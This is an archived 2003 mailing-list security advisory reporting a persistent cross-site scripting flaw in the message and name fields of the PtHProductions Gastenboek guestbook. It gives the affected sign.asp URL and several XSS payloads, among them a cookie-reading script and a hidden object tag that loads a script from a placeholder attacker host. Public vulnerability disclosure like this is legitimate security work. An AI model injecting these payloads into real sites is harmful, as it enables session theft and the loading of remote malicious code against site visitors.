lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 1 Sep 2003 09:57:43 -0700
From: "morning_wood" <se_cur_ity@...mail.com>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>,
   <helpdesk@...productions.be>
Subject: PtHProductions Gastenboek - XSS


------------------------------------------------------------------
          - EXPL-A-2003-022 exploitlabs.com Advisory 022
------------------------------------------------------------------
                -= PtHProductions Gastenboek =-


Donnie Werner
Aug, 29 2003


Vunerability(s):
----------------
1. Persistant XSS injection


Product:
--------
PtHProductions Gastenboek


Description of product:
-----------------------
Guestbook for / by www.pthproductions.be


VUNERABILITY / EXPLOIT
======================
message and name fields allows XSS injection

view - Bekijk gastenboek 
post - Teken gastenboek
 
http://www.pthproductions.be/jongeren/Gastenboek/sign.asp

input XSS of your choice
<SCRIPT>alert(document.domain);</SCRIPT>
<SCRIPT>alert(document.cookie);</SCRIPT>
or
<object style="display:none" data="http://verybad-exploit-url/bad.js"></object>


Local:
------
no

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
helpdesk@...productions.be 
Concurrent with this advisory


Credits:
--------
Donnie Werner
morning_wood@...labs.com
exploited? http://exploitlabs.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists